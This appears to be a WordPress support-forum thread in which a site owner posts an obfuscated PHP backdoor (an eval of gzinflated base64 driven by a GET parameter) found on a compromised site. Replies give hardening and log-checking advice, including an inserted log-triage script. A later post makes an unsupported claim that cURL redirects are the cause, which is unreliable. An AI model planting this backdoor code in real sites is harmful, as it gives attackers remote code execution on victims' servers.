
WordPress 2.7 Vulnerability? (3 posts)

  1. mcupples1
    Member
    Posted 5 years ago #

    Hello all! There's a problem I've got with the new WordPress in that I just found this file:

    <?php if(isset($_GET['p'])){eval(gzinflate(base64_decode('fY9dq4JAEIb/yiJyNJDVvk+FRMQWwUljXbuJWGwdcMFWyS3q358tu/Zqvp73nRlbFChE4n4ruVRSu73FJ29AV7V2bVF4aJ3Sv/j
    AuAkesgqt67nvT39xP5jhwRAPRoGfv9RdybG/rEML65u8ujbfEnZyaufcw9ZPo0zf+IISVQ5mmBB6JPTktJFHqz0xZMfyQ5wwDwUdBCUspRGjqyjZEOqhfgfLdnsSp8ZwYhztPNNZ+GHhCeJNfqWirBpoa3hk
    pXvJGpiMeA7tF2+duRmeUi/+AQ==')));}?>

    called p.php in my wordpress directory. It was placed there on the 14th. Our site went down today at roughly 8am because of several hundred computers all going to:

    /p.php?p=1-3897
    /p.php?p=1-2910

    etc.

    Any ideas on how to make sure this issue won't happen again? I've since moved p.php to a directory not accessible via the web.

    Thanks!

  2. That's not necessarily a sign of a 2.7 vulnerability. It's your host that did get compromised. Moving or removing the file is good, but you need to find and close the door that let that onto your blog.

    Check your file and directory permissions for your website. You should read up on these links:

    http://codex.wordpress.org/Hardening_WordPress

    and

    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/

    Check your user table for any new accounts that you don't recognize. You can use phpMyAdmin or mysql on the command line like so:

    USE yourwordpressdb;
    SELECT * FROM wp_users;

    This is just to see how bad the compromise is. If you are not seeing spammy hidden links in your blog's HTML, and you don't see any users that you don't recognize, then WordPress may be fine.

    If you do find spammy links and new unknown users then get ready to restore your last good backup from before 12/14.

    Check your logs for the first occurrence of p.php to see if you can identify when and how it got on your blog.

    Read Donncha's post and also check out http://ocaoimh.ie/2008/06/26/wordpress-exploit-scanner-01/.

    Good luck.
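
Added example, not part of the thread: one way to do the log check suggested in the reply above, finding the first request for p.php, what that client requested shortly before it, and how many distinct clients requested the file. The log lines, IP addresses, dates and the /example-upload.php path are constructed, and the Apache "combined" log format is an assumption about the host.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Assumed Apache/nginx "combined" format; adjust if your host logs differently.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (documentation IP ranges), not from the poster's site.
SAMPLE_LOG = """\
198.51.100.7 - - [14/Dec/2008:03:10:02 +0000] "GET /wp-login.php HTTP/1.1" 200 2100 "-" "-"
198.51.100.7 - - [14/Dec/2008:03:11:40 +0000] "POST /example-upload.php HTTP/1.1" 200 312 "-" "-"
203.0.113.5 - - [14/Dec/2008:03:11:55 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "-"
198.51.100.7 - - [14/Dec/2008:03:12:05 +0000] "GET /p.php?p=1-1 HTTP/1.1" 200 64 "-" "-"
203.0.113.9 - - [17/Dec/2008:08:00:01 +0000] "GET /p.php?p=1-3897 HTTP/1.1" 200 64 "-" "-"
203.0.113.10 - - [17/Dec/2008:08:00:02 +0000] "GET /p.php?p=1-2910 HTTP/1.1" 200 64 "-" "-"
not a log line
"""

def parse(log_text):
    """Return parsed entries in file order; unparseable lines are skipped."""
    out = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["path"] = urlsplit(e["target"]).path  # drop the ?p=... query string
        out.append(e)
    return out

def triage(entries, path="/p.php", window=timedelta(minutes=30)):
    """First hit on `path`, that client's requests just before it, and client count."""
    hits = [e for e in entries if e["path"] == path]
    if not hits:
        return None
    first = min(hits, key=lambda e: e["ts"])
    before = [e for e in entries
              if e["ip"] == first["ip"] and first["ts"] - window <= e["ts"] < first["ts"]]
    return {"first": first, "before": before, "clients": len({e["ip"] for e in hits})}

if __name__ == "__main__":
    r = triage(parse(SAMPLE_LOG))
    print("first hit:", r["first"]["ts"], r["first"]["ip"], r["first"]["target"])
    print("earlier:", [(e["method"], e["target"], e["status"]) for e in r["before"]])
    print("distinct clients:", r["clients"])
```

Requests in the "earlier" list, POSTs in particular, are the ones to compare against file modification times when looking for how the file arrived.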

  3. gasyoun
    Member
    Posted 5 years ago #

    CURL is the wordpress vulnerability 2.7+

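    class WP_Http_Curl {
    	function request($url, $args = array()) {
    		// ... excerpt: rest of the method omitted ...
    		// Follow HTTP redirects unless safe_mode or open_basedir is set
    		if ( !ini_get('safe_mode') && !ini_get('open_basedir') )
    			curl_setopt( $handle, CURLOPT_FOLLOWLOCATION, true );
    		// ...
    	}
    }

    // Fetch a URL through whichever HTTP transport object WordPress selects
    function wp_remote_get($url, $args = array()) {
    	$objFetchSite = _wp_http_get_object();

    	return $objFetchSite->get($url, $args);
    }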

    Read http://antichat.ru/threadedpost1298124.html#post1298124 with Google Translate, this is why there are so many WordPress trojans. Kill 'em.

Topic Closed

This topic has been closed to new replies.
